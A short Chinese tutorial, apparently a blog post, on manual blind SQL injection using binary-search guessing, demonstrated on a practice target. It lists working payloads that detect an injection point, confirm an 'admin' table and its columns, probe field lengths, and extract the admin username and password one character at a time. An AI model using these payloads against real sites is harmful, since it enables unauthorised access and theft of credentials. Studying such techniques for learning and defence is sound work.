手工注入-折半猜解
时间:2021-02-16 12:42:04
收藏:0
阅读:0
(利用靶机演示)
第一步:判断注入点
‘报错存在注入的可能,and 1=1 、and 1=2一个返回正常,一个不正常,绝大多数存在注入
示例:
加‘,返回异常:
加 and 1=1,返回正常:
加 and 1=2,返回异常:
第二步:猜解表名
判断是否存在admin表,and exists(select * from admin)
返回正常,存在admin表
第三步:猜解字段
and exists(select admin from admin)
存在admin字段
and exists(select password from admin)
存在password字段
第三步猜解用户名与密码长度
and (select top 1 len(admin) from admin)>1
and (select top 1 len(password) from admin)>1
用户名长度为5,密码长度为16
and (select top 1 asc(mid(字段名,1,1))from 表名)=97
第四步:折半猜解用户名密码
97为a
100为d
109为m
同理,可得用户名为admin,密码同理
eg: and (select top 1 asc(mid(password,1,1))from admin)=97
评论(0)